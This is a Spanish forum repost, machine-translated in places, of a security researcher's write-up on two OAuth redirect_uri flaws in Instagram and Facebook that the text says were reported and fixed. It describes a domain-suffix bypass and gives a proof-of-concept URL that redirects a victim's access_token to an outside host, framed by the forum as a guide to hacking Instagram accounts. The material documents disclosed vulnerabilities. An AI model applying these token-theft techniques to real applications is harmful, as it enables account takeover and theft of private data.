Estamos migrando de sistemas de foros, por favor repórtanos cualquier problema a [email protected], si te llega a tu bandeja de entrada o a spam un correo que te dice que se solicitó el cambio de contraseña, no te alarmes, es un procedimiento normal de la migración, cambia tu contraseña porque no hay compatibilidad en el sistema de cifrado del viejo sistema con el sistema nuevo, por eso debes resetear tu clave con ese enlace.

un vistaso a las vulnerabilidades Instagram

¿Como hackear las cuenta de instagram?


En este post, voy a mostrar cómo fui capaz de hackear cuentas de Instagram a través de vulnerabilidades de OAuth (Instagram.com / facebook.com).

Hay básicamente dos maneras de tomar ventaja de Instagram OAuth.

  1. Secuestrar cuentas de Instagram Instagram utilizando OAuth ([hide]https://instagram.com/oauth/authorize/[/hide])
  2. Secuestrar cuentas de Instagram con Facebook OAuth diálogo ([hide]https://www.facebook.com/dialog/oauth[/hide])

Ataque con éxito nos permiten acceder a:

  • Fotos privadas
  • La capacidad de eliminar fotos y editar comentarios
  • La capacidad de publicar nuevas fotos.

Porque yo me diversión con Instagram, "me dije a mí mismo:" Tal vez debería comprobar su seguridad? "

Así que cuando Facebook adquirida Instagram, empecé a comprobar a las vulnerabilidades de seguridad, yo les informé varias vulnerabilidades, incluyendo ataques OAuth, pero la adquisición aún no cerrada y Facebook Seguridad podido poner sus manos sobre los problemas de seguridad, así que esperé, esperé como WhiteHat,

Más tarde recibí un mensaje de Facebook de Seguridad, dijeron: Ni siquiera ellos podían arreglarlo, todavía quieren pagar estas vulnerabilidades.
Aquired.jpg




Así que les dije: No hay necesidad de pago, eso es porque no podían llevar a cabo controles de seguridad antes de que el cierre de la adquisición,

Es increíble ver cómo el equipo de seguridad de Facebook ase un gran trabajo en cuanto a su programa de recompensas de errores, incluso que no cierran la adquisición, aún quieren pagar por estas vulnerabilidades.

Durante la investigación de los parámetros de seguridad de Instagram, me di cuenta de que Facebook Seguridad ha producido algunos resultados impresionantes en cuanto a sus propias vulnerabilidades Instagram OAuth. En esencia, bloquearon el acceso a cualquier y todos los archivos, carpetas y subdominios de validar el parámetro redirect_uri.


Block-Differnet-domain.jpg



Además, la redirección sólo se le permitió ir al dominio de aplicación propietario. Eso fue especialmente mala noticia para mí.

Por lo tanto, tenía que encontrar alguna otra manera de conseguir más allá de su protección. Para complicar aún más el problema era el hecho de que usted no puede utilizar una redirección / XSS en la victima propietaria de la aplicasion. Esto se debe a que no tienen acceso a los archivos o carpetas en el dominio de aplicación dueño a través del parámetro redirect_uri.

Block-Files-Folders.jpg

Por ejemplo:

Permitir solicitud:

[hide]https://apigee.com[/hide]

Bloquear solicitudes:

Redirect_uri = [hide]https://www.breaksec.com[/hide]

Redirect_uri = [hide]https://a.apigee.com/[/hide]

Redirect_uri = [hide]https://apigee.com/x/x.php[/hide]

Redirect_uri = [hide]https://apigee.com/[/hide] 23%,? o cualquier signo especial

En la actualidad, parece que la redirect_uri es invulnerable a los ataques de OAuth.

Durante la investigación, me encontré con un bypass furtivo. Si el atacante utiliza un truco sufijo en el dominio de la aplicación propietaria, que pueden pasar por alto el Instagram OAuth y luego enviar el código access_token al propietario del dominio.

Por ejemplo:

Digamos que mi aplicación client_id en Instagram es 33221863xxx y mi dominio es breaksec.com

En este caso, el parámetro redirect_uri debe permitir redirección sólo para mi dominio (breaksec.com), ¿no? ¿Qué sucede cuando se cambia el sufijo de dominio a algo así como:

Breaksec.com.mx

En este ejemplo, el atacante puede enviar el access_token, el código directamente a breaksec.com.mx. Para que el ataque tenga éxito, por supuesto, el atacante tendrá que comprar el nuevo dominio (en este caso, breaksec.com.mx).

domainavaible.jpg

También es posible comprar otros dominios breaksec.com como:

com.tw

com.mx

com.es

com.co

com.bz

com.br

com.ag

Bypass PoC (fijado por Facebook Security Team):

Game Over.



Bug 2.

Con este error, he usado el valor client_id Instagram a través del Facebook OAuth ([hide]https://www.facebook.com/dialog/oauth[/hide]).

Cuando se utiliza la aplicación Instagram, que se puede integrar con Facebook.

Por ejemplo:

Cuando un usuario quiere subir sus fotos Instagram a Facebook, permiten esta interacción e integración se lleven a cabo.
sharing-option-instagram.png
Instagram-Would-like-to-access-your-public-profile-and-friend-list.png

Para mi sorpresa, descubrí que un atacante puede utilizar prácticamente en cualquier dominio del redirect_uri, parámetro siguiente. Este fue en realidad una especie de desconcertante y no sé por qué sucedió esto, pero funcionó. Usted, literalmente, puede utilizar cualquier dominio redirect_uri, proximo parámetro a través del redirect_uri en Instagram client_id.

Esto efectivamente permite al atacante robar el access_token de cualquier usuario de Instagram,

Con el access_token el atacante será capaz de publicar en el nombre víctima en su cuenta de Facebook, Acceso a su lista de amigos privada.

PoC (Facebook ya fija este número):

[hide]https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token[/hide]

PoC vídeo:


[video]


¡Hasta la próxima ;)

Por @ Nirgoldshlager


>Fuente breaksec.com
«13456789

Comentarios

Accede o Regístrate para comentar.